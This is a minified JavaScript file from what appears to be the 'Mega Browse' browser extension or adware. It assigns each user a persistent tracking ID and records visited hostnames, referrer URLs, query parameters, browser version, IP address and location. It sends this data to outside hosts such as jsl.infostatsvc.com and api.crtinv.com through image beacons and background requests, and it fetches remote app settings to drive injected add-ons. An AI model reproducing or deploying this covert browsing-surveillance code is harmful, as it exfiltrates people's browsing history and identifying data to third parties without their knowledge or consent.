(function(){function E(a,b){if(a.constructor){var c=a.constructor.prototype[b],d=typeof c;if("function"==d||r&&9>r&&"object"==d)return function(){return c.apply(a,arguments)}}if(r&&8>r&&a===s)try{return eval(["(function () {delete ","; return ",";})()"].join(b))}catch(e){}return a[b]}function F(a){for(var b={},c=s.location.search.substr(1).split("&"),d=0;d<c.length;d++){var e=c[d].split("=");b[decodeURIComponent(e[0])]=2==e.length?decodeURIComponent(e[1]):""}return b[a]}function T(a){if("function"==
typeof U)return U(a);for(var b,c=0,d=ua,e="";a.charAt(c|0)||(d="=",c%1);e+=d.charAt(63&b>>8-c%1*8))b=b<<8|a.charCodeAt(c-=-.75);return e}function x(a){for(var b="",c=0;c<a;c++)b+=va.charAt(Math.floor(16*Math.random()));return b}function V(){return[x(8),x(4),x(4),x(4),x(12)].join("-")}function W(){var a=new Date,b=a.getUTCMonth()+1;return""+a.getUTCFullYear()+(9<b?"":"0")+b+a.getUTCDate()}function M(a){for(var b=[],c=0;c<a.length;c++)b.push(encodeURIComponent(a[c].toString().replace(/,/g,"$cma;")));
(new Image).src="https:"+wa+b.shift()+"="+b.join("|,|")}function xa(){for(var a=0;a<X.length;a++){var b=X[a].exec(navigator.userAgent);if(b)return a=b.splice(1,2),2>a.length&&a.push("0"),a}return["Unknown","0"]}function ya(a,b){a.addEventListener?a.addEventListener("message",b,!1):a.attachEvent&&a.attachEvent("onmessage",b)}function G(a,b,c,d){var e=(new Date).valueOf(),f;if(!(d&&m>=za&&e-z<Aa))return d&&w(Y,z=e),!r||9<r?(f=new XMLHttpRequest,f.onload=function(){d&&w(N,200==f.status?m=0:++m);"function"==
typeof b&&b.call(f)},f.open("GET",a),f.timeout=Z,f.send()):(f=new XDomainRequest,f.onload=function(){d&&w(N,m=0);"function"==typeof b&&b.call(f)},f.ontimeout=f.onerror=function(){d&&w(N,++m);"function"==typeof c&&c.call(f)},f.onprogress=function(){return Ba},f.timeout=Z,f.open("GET",a),O(function(){f.send()},0)),f}function n(a){try{return p.parse(localStorage.getItem(a))}catch(b){}}function w(a,b){try{localStorage.setItem(a,p.stringify(b))}catch(c){}}function $(a){var b=(new Date).valueOf(),c="function"==
typeof a,d=aa+"/gd2?r="+W();!k||b-k[t]>=k[H]?G(d,function(){k=p.parse(this.responseText);k[t]=b;w(ba,k);c&&a()},function(){c&&a()}):c&&a()}function ca(a){var b=(new Date).valueOf(),c="function"==typeof a,d=aa+"/ga2?r="+W();!u||b-u[t]>=u[H]?G(d,function(){u=p.parse(this.responseText);u[t]=b;w(da,u);c&&a()},function(){c&&a()}):c&&a()}function Q(a,b,c){var d=(new Date).valueOf(),e="function"==typeof c;b=Ca+(a?"/uu?a="+encodeURIComponent(a)+"&e="+encodeURIComponent(b)+"&r=":"/gu?r=")+1E20*Math.random()+
"&g="+encodeURIComponent(g);a||!h||d-h[t]>=h[H]?G(b,function(){h=p.parse(this.responseText);h[t]=d;w(ea,h);e&&c()},function(){e&&c()},!0):e&&c()}function R(a,b){var c=T(a),d=a.length,e=new Date;e.valueOf()-(l[t]||0)>=Da&&(l={});var f=l[c];if(f)"function"==typeof b&&b(f);else if("function"==typeof b&&I.push(b),"undefined"==typeof fa){for(var g=e.getUTCFullYear(),h=e.getUTCMonth(),k=e.getUTCDate(),g=[31,(g%4||!(g%100))&&g%400?28:29,31,30,31,30,31,31,30,31,30],q=0;q<h;q++)d+=g[q];fa=G("//api.crtinv.com/uchelper?l="+
c+"&k="+T((d+k).toString()),function(){try{var b=this.responseText,a=p.parse(b.substring(1,b.length-1));f={categories:[],isBadCategory:a[Ea],isBadUrl:a[Fa]};l[t]||(l[t]=e.valueOf());for(q in a[Ga])f.categories.push(parseInt(q,10));l[c]=f;for(w(ga,l);I.length;)I.pop()(f)}catch(d){}})}}function ha(a,b,c,d){for(var e=0;e<c.length;e++)if(ia(a,c[e]))return!0;for(e=0;e<b.length;e++)if(ia(a,b[e]))return"undefined"!=typeof d&&d instanceof Array&&d.push(b[e][Ha]||0),!1;return!c.length||!!b.length}function ia(a,
b){for(var c=a.toLowerCase().split("."),d=b.domain.toLowerCase().split("."),e=!1;d.length;)for(var f=d.pop();c.length;){var g=c.pop();if(f==g){e||(e=!0);break}if(b.isTLD||e)return!1}return e}function Ia(a){var b=v.createElement("script");b.type="text/javascript";b.src="//cdnjs.cloudflare.com/ajax/libs/json3/3.2.4/json3.min.js";b.onload=b.onreadystatechange=function(){if(!this.readyState||"loaded"==this.readyState||"complete"==this.readyState){b.onload=b.onreadystatechange=null;b.parentNode.removeChild(b);
try{"function"==typeof a&&a()}catch(c){}}};(v.body||v.head).appendChild(b)}function ja(){function a(b){try{if(b.source==s.top){var a=b.data;"string"==typeof a&&(a=p.parse(a));"object"==typeof a&&a.ext==y&&("getcategory"==a.msg?R(q,function(a){a={ext:y,msg:"category",categoryData:a};s.top.postMessage(!r||9<r?a:p.stringify(a),b.origin||"*")}):"statechange"==a.msg&&"number"==typeof a.appid&&"boolean"==typeof a.state&&Q(a.appid,a.state))}}catch(c){}}function b(){if(q&&k&&u){var b=u[ka]||0,n=k&&k[ka]||
0,l=[],m=-1,A=new Date,K=parseInt,B;a:{try{B=p.parse(sessionStorage.getItem(la));break a}catch(N){}B=void 0}K=K(B,10);if(!K){K=A.valueOf();try{sessionStorage.setItem(la,p.stringify(K))}catch(O){}}v.images&&(P||(M(["InitialPageVisit_2",L+"_"+y,g,q,n,b]),P=!0,w(ma,P)),!J||A.getUTCFullYear()>J.getUTCFullYear()||A.getUTCMonth()>J.getUTCMonth()||A.getUTCDate()>J.getUTCDate())&&(M(["DailyActiveExtensionUser_4",L,y,t,C||"",g,n,b].concat(I)),J=A,w(H,J.valueOf()));h&&(d=h.user||{},na||(na=!0,d.apps[oa]&&d.apps[oa].enabled&&
R(q,function(a){for(a=a.categories.slice(0,5);5>a.length;)a.push("");M(["PanelPageVisit_4",y,g,f,A.valueOf(),F("n").substr(0,1E3),F("t").substr(0,1E3),x.substr(0,4E3),F("r").substr(0,4E3),n,b].concat(a,I,L,h[pa].countryCode))})));if(ha(q,k.blacklistedDomains||[],[],l))qa||(qa=!0,M(["PageVisitCounter_1",L+"_"+y,g])),.1>Math.random()&&R(q,function(a){for(a=a.categories.slice(0,5);5>a.length;)a.push("");M(["PageVisit_2",L+"_"+y,g,G,n,b].concat(a))});else for(;l.length;)m&=l.pop();l=u.appsWithSettings||
[];for(B=0;B<l.length;B++){var D=l[B],E=D[Ja]||-1,z=d.apps[D.id];z&&z.enabled&&(E&m)==E&&(D.sessionDelay||0)<=A.valueOf()-K&&ha(q,D.blacklistDomains,D.whitelistDomains)&&(D.customSettings.bitFlags=z.bitFlags,e.push(D))}ya(s,a);m={ext:y,msg:"userdata",installSource:C,ip:h[Ka],geo:h[pa],bucketId:d[La],token:f,appData:e};s.top.postMessage(!r||9<r?m:p.stringify(m),c.protocol+"//"+c.hostname+(80!=c.port&&443!=c.port?":"+c.port:""))}}g=localStorage.getItem(ra);C=localStorage.getItem(sa);P=n(ma);k=n(ba);
u=n(da);h=n(ea);l=n(ga)||{};z=n(Y)||0;m=n(N)||0;var c=v.createElement("a");c.href=v.referrer;E(s,"setInterval");var d={},e=[],f=V(),t="https:"==c.protocol,x=v.referrer,G=x.substr(0,2E3),q=c.hostname,H=t?Ma:Na,J=new Date(n(H)||0),I=xa();g&&ta.test(g)||(g=F("g"),g&&ta.test(g)||(g=V(),C="thin"),localStorage.setItem(ra,g));C||(C=F("is"),localStorage.setItem(sa,C));L=F("bp")||"BF";k&&u&&h?b():(k||$(b),u||ca(b),h||Q(null,null,b));O(function(){$()},S);O(function(){ca()},S);O(function(){Q()},S)}var s=window,
v=document,p,r=!1,ua="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",y="Mega Browse",Ca="//api.megabrowse.biz",aa="//apimegabrowsebiz-a.akamaihd.net",Da=6048E5,Z=5E3,za=3,S=3E4,Aa=9E5,ra="ug",sa="is",ma="irl",Na="aul",Ma="asul",la="st",ba="platform_blacklist",Ha="aat",da="app_data",Ja="t",ea="user_state",Ka="ip",La="bucketId",pa="geo",H="cacheTimeMS",ka="serverTimestamp",t="timestamp",ga="categories",Ga="uc",Ea="hc",Fa="bu",Y="xhr_timestamp",N="xhr_fail_count",
oa=1015,wa="//jsl.infostatsvc.com/?",L,g,C,P=!1,k,u,h,l,I=[],fa,na=!1,qa=!1,z,m,O=E(s,"setTimeout"),U=E(s,"btoa"),Ba="foo",va="0123456789abcdef",ta=/^[\d,a-f]{8}-(?:[\d,a-f]{4}-){3}[\d,a-f]{12}$/i,X=[/\b(IR)\/([\d\.]+)\b/i,/\b(opr)\/([\d\.]+)\b/i,/\b(lunascape)[\/ ]([\d\.]+)\b/i,/\b(maxthon)\/([\d\.]+)\b/i,/\b(yabrowser)\/([\d\.]+)\b/i,/\b(mrchrome)\b/i,/\b(chrome)\/([\d\.]+)\b/i,/\b(msie)\s([\d\.]+)\b/i,/\b(trident)\/([\d\.]+)\b/i,/\b(firefox)\/([\d\.]+)\b/i,/\b(safari)\/([\d\.]+)\b/i,/\b(opera)\/([\d\.]+)\b/i];
(function(){var a=v.documentMode,b;try{delete v.documentMode,b=v.documentMode,v.documentMode=a}catch(c){}"number"==typeof b?r=b:"number"==typeof a&&(r=a);var d=s.JSON;"object"==typeof d&&"function"==typeof d.stringify&&"function"==typeof d.parse?(p=d,ja()):Ia(function(){p=s.JSON;"undefined"!=typeof d&&(s.JSON=d);ja()})})()})();
